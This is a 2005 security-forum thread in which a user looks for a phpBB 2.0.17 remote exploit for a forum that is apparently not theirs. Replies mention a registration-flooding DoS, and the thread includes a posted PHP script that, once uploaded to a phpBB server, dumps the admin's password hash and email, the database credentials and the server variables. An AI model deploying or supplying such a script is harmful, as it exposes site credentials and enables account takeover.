Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
November 14, 2019
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 329
Members: 0
Total: 329
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> exploit phpBB 2.0.17
Post new topic  Reply to topic View previous topic :: View next topic 
exploit phpBB 2.0.17
PostPosted: Sun Oct 16, 2005 4:21 pm Reply with quote
Jolsch
Beginner
Beginner
 
Joined: Oct 16, 2005
Posts: 3




Could cb tell me where to find or where to search a phpBB 2.0.17 remote exploit??? because I've been searching a whole day and i could'nt find one... Confused Question Question

would be nice thx....
View user's profile Send private message
PostPosted: Sun Oct 16, 2005 6:51 pm Reply with quote
Chb
Valuable expert
Valuable expert
 
Joined: Jul 23, 2005
Posts: 206
Location: Germany




Maybe there is no public exploit for version 2.0.17 because it's the newest?

_________________
www.der-chb.de
View user's profile Send private message Visit poster's website ICQ Number
PostPosted: Mon Oct 17, 2005 4:21 am Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




There are no public exploits for phpBB 2.0.17 currently.
If there is no registration confirmation code on the register page you could use a DoS sploit that makes thousands of users. Razz

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Mon Oct 17, 2005 2:32 pm Reply with quote
Jolsch
Beginner
Beginner
 
Joined: Oct 16, 2005
Posts: 3




And could anyone tell me what and how i got to use this script?


<?php

define('IN_PHPBB', true);
$phpbb_root_path = '';
include($phpbb_root_path . '/extension.inc');
include($phpbb_root_path . '/db/mysql.'.$phpEx);
include($phpbb_root_path . '/common.'.$phpEx);
?>

<b><h2>Do Not Worry About the Errors Above. The Information you Want is below Smile</h2></b>

<h4>
Admin Forum Information: </h4>
<?php
$uid = '2';

$sql = "SELECT user_id, username, user_password, user_email
FROM ". USERS_TABLE ."
WHERE user_id = $uid";
if ( !($result = $db->sql_query($sql)) )
{
message_die(GENERAL_ERROR, 'Error in obtaining userdata', '', __LINE__, __FILE__, $sql);
}

echo "<table>\n";
while ($line = mysql_fetch_array($result, MYSQL_ASSOC))
{
echo "\t<tr>\n";
foreach ($line as $col_value)
{
echo "\t\t<td> $col_value </td>\n";
}
echo "\t<tr>\n";
}
echo "</table>\n";
?>
<h4>
Database Information:<br/></h4>
Database Type = <?php echo $dbms;?><br/>
DB Host = <?php echo $dbhost;?><br/>
DB Name = <?php echo $dbname;?><br/>
DB User = <?php echo $dbuser;?><br/>
DB Password = <?php echo $dbpasswd;?><br/>
DB Table Prefix = <?php echo $table_prefix;?><br/>
<p>
<p>
<?php print "Document root is ".$_SERVER["DOCUMENT_ROOT"]."<br />";
print "This page is called ".$_SERVER["PHP_SELF"]; ?>
<p>
<p>
<p>
<p>
<h4>And here is a load of useful info</h4></p>
<?php
print_r($_SERVER);
?>
<p>
<p>

<?php
print $_SERVER[""];#Built in Variable name
?>


I already read how to do but in the forum i want to use it it says that the folder is empty..... Question ..
Thx jolsch
View user's profile Send private message
PostPosted: Mon Oct 17, 2005 5:40 pm Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




lolz I wrote that. It has to be on the server with the forums. Then you goto the url. Uploading it is the problem. It was part of my early testing Wink

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Wed Oct 19, 2005 2:06 pm Reply with quote
Jolsch
Beginner
Beginner
 
Joined: Oct 16, 2005
Posts: 3




The problem is that this thing doesnt work!
I dont know wyh cause i dint do ''php-things'' usually....but now i need it....
I already began to learn but ...takes time...
The forum i want to use it in says that the file is empty...why Question


pls help me....

jolsch
View user's profile Send private message
PostPosted: Wed Oct 19, 2005 6:07 pm Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




That is not an exploit. That was for testing back in my early days and it does work when you use it right.
2.0.17 has no public vulns.

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Sun Oct 23, 2005 5:34 pm Reply with quote
WaterBird
Active user
Active user
 
Joined: May 16, 2005
Posts: 37




New exploit 2.0.17 ?

http://www.securityfocus.com/bid/15170/discuss
View user's profile Send private message
PostPosted: Sun Oct 23, 2005 10:37 pm Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




Its not really an exploit its more of a vuln. Its quite simple and thats why the phpbb team haven't released 2.0.18. But if you want the latest updates to your forum use the phpbb CVS where you can also download 2.1 (the unstable version of 3.0)

http://area51.phpbb.com/cvs

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Mon Oct 24, 2005 12:29 am Reply with quote
WaterBird
Active user
Active user
 
Joined: May 16, 2005
Posts: 37




hehe thx but i am not using phpbb anymore :} Just asking Wink But thx ! o_0
View user's profile Send private message
exploit phpBB 2.0.17
  www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






Book Opinions
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.080 Seconds